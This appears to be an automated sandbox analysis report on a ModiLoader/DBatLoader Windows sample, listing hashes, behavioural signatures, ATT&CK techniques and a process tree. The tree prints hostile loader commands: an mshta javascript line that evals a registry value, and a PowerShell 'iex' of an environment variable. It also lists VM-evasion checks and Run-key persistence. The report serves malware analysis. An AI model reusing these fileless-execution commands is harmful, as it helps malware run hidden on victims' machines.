Analysis

  • max time kernel
    155s
  • max time network
    169s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    04-10-2022 18:29

General

  • Target

    c6b2d57e8ce70dae5585a096e2e17619.exe

  • Size

    524KB

  • MD5

    c6b2d57e8ce70dae5585a096e2e17619

  • SHA1

    a61e6e668205f7fbdd2bc03dbd9e1ae85c9af241

  • SHA256

    62184398a535b5aa0ccd7457470cdb9ab4fc22aaaed11a19cef2ddba8d75eaf5

  • SHA512

    91c8895086107b72f48988ed807518630529646df26c094e4c4251ef58dc7a099bd59760c92f5ebaf9359d8e5196a4bfd1e3ced0dd8cb0634d0c27bbb8036f23

  • SSDEEP

    6144:PHoex1r1iKzGkYj+eNnHNvdySJbsSt+c4yR83tahDYz2aUIsR3GiXMj9KpJzLIW:/bL6k2+Ak6+hyy3E0bUBR3G2LIW

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 12 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c6b2d57e8ce70dae5585a096e2e17619.exe
    "C:\Users\Admin\AppData\Local\Temp\c6b2d57e8ce70dae5585a096e2e17619.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:848
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:ca8SS8xE="7yEPV";Q21m=new%20ActiveXObject("WScript.Shell");Wj5v2z="RC";P6j4tq=Q21m.RegRead("HKCU\\software\\AnPNgVo0i\\7HJLrr");IJa2B8="JJEy9dU";eval(P6j4tq);iEFRr19lu="n";
    1⤵
    • Process spawned unexpected child process
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:uadbc
      2⤵
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1012
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe
        3⤵
        • Looks for VirtualBox Guest Additions in registry
        • Looks for VirtualBox drivers on disk
        • Looks for VMWare Tools registry key
        • Checks BIOS information in registry
        • Deletes itself
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1724
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe"
          4⤵
            PID:1696

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Virtualization/Sandbox Evasion

    3
    T1497

    Modify Registry

    2
    T1112

    Discovery

    Software Discovery

    1
    T1518

    Query Registry

    4
    T1012

    Virtualization/Sandbox Evasion

    3
    T1497

    File and Directory Discovery

    1
    T1083

    System Information Discovery

    3
    T1082

    Peripheral Device Discovery

    1
    T1120

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/848-54-0x0000000075041000-0x0000000075043000-memory.dmp
      Filesize

      8KB

    • memory/848-56-0x0000000000400000-0x000000000048C1E8-memory.dmp
      Filesize

      560KB

    • memory/848-55-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/848-57-0x0000000000400000-0x000000000048C1E8-memory.dmp
      Filesize

      560KB

    • memory/848-58-0x0000000000490000-0x000000000056C000-memory.dmp
      Filesize

      880KB

    • memory/848-59-0x0000000000490000-0x000000000056C000-memory.dmp
      Filesize

      880KB

    • memory/848-70-0x0000000000490000-0x000000000056C000-memory.dmp
      Filesize

      880KB

    • memory/1012-63-0x00000000734D0000-0x0000000073A7B000-memory.dmp
      Filesize

      5.7MB

    • memory/1012-62-0x00000000734D0000-0x0000000073A7B000-memory.dmp
      Filesize

      5.7MB

    • memory/1012-64-0x0000000005CB0000-0x0000000005D8C000-memory.dmp
      Filesize

      880KB

    • memory/1012-67-0x00000000734D0000-0x0000000073A7B000-memory.dmp
      Filesize

      5.7MB

    • memory/1012-68-0x0000000005CB0000-0x0000000005D8C000-memory.dmp
      Filesize

      880KB

    • memory/1012-60-0x0000000000000000-mapping.dmp
    • memory/1696-71-0x000000000018C6D0-mapping.dmp
    • memory/1696-73-0x0000000000130000-0x000000000027A000-memory.dmp
      Filesize

      1.3MB

    • memory/1696-75-0x0000000000130000-0x000000000027A000-memory.dmp
      Filesize

      1.3MB

    • memory/1724-65-0x000000000031C6D0-mapping.dmp
    • memory/1724-69-0x00000000002C0000-0x000000000040A000-memory.dmp
      Filesize

      1.3MB

    • memory/1724-74-0x00000000002C0000-0x000000000040A000-memory.dmp
      Filesize

      1.3MB